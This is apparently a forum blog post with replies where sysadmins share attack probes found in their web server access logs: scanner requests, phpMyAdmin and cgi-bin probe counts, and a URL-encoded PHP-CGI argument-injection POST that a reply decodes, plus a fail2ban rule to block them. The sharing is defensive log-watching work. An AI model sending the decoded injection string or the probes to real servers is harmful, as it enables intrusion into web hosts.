Exploit permissions?
Posted 10-27-2015 at 06:48 PM by Habitual
Found this today in my access.log
I have to admit, It's a humorous touch.
What's next?
Feel free to show some of the ones you all have, or am I the only one who stares at logs all day?
Code:
GET //skin/install/default/install.php?q=echo(\"CAN_I_UPLOAD_SHELL_HERE\")
What's next?
Code:
GET //skin/install/default/install.php?q=echo(\"THE_MATRIX_HAS_YOU\?)"
Total Comments 3
Comments
-
You're not the only one.
These are just a few entries from the web server running in my basement, not any kind of production server or anything with something desirable on it.
Code:61.19.246.190 - - [19/Aug/2014:11:22:41 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 487 "-" "ZmEu" 122.226.223.69 - - [17/Aug/2014:12:29:53 -0400] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 404 530 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" 209.67.233.66 - - [30/Aug/2014:20:46:28 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 506 "-" "-" 115.29.10.210 - - [06/Sep/2014:07:56:46 -0400] "GET http://hotel.qunar.com/render/hoteldiv.jsp?&__jscallback=XQScript_4 HTTP/1.1" 404 452 "http://hotel.qunar.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36"
Code:$ grep -i "GET /PhpMyAdmin" all_access.log | wc -l 1191 $ grep -i "GET /pma" all_access.log | wc -l 561
Code:$ grep -i "cgi-bin" all_access.log | wc -l 3085
Code:221.194.47.232 - - [17/Aug/2014:13:09:13 -0400] "POST /cgi-bin/php4?2D64+61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
Posted 11-15-2015 at 02:58 PM by maples
Updated 11-15-2015 at 03:03 PM by maples (Adding more) -
Quote:You're not the only one.
These are just a few entries from the web server running in my basement, not any kind of production server or anything with something desirable on it.
Code:61.19.246.190 - - [19/Aug/2014:11:22:41 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 487 "-" "ZmEu" 122.226.223.69 - - [17/Aug/2014:12:29:53 -0400] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 404 530 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" 209.67.233.66 - - [30/Aug/2014:20:46:28 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 506 "-" "-" 115.29.10.210 - - [06/Sep/2014:07:56:46 -0400] "GET http://hotel.qunar.com/render/hoteldiv.jsp?&__jscallback=XQScript_4 HTTP/1.1" 404 452 "http://hotel.qunar.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36"
Code:$ grep -i "GET /PhpMyAdmin" all_access.log | wc -l 1191 $ grep -i "GET /pma" all_access.log | wc -l 561
Code:$ grep -i "cgi-bin" all_access.log | wc -l 3085
Quote:And does anyone have any idea what's going on with this? Google doesn't seem to like it.
Code:221.194.47.232 - - [17/Aug/2014:13:09:13 -0400] "POST /cgi-bin/php4?2D64+61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
Code:allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
Good Stuff.
Thanks!Posted 05-04-2016 at 11:41 AM by Habitual -
Code:
118.193.27.2 - - [16/May/2016:12:09:58 -0700] "\x16\x03\x01\x01"\x01" 200 8329 "-" "-" 118.193.27.2 - - [16/May/2016:12:10:07 -0700] "USER test +iw test :Test Wuz Here" 400 0 "-" "-"
Code:failregex = ^<HOST> .* ".*?\\x16\\x03\\x01\\x01\\.*?" ^<HOST> .* ".*?test.*?"
Posted 05-16-2016 at 02:37 PM by Habitual
Updated 05-16-2016 at 02:39 PM by Habitual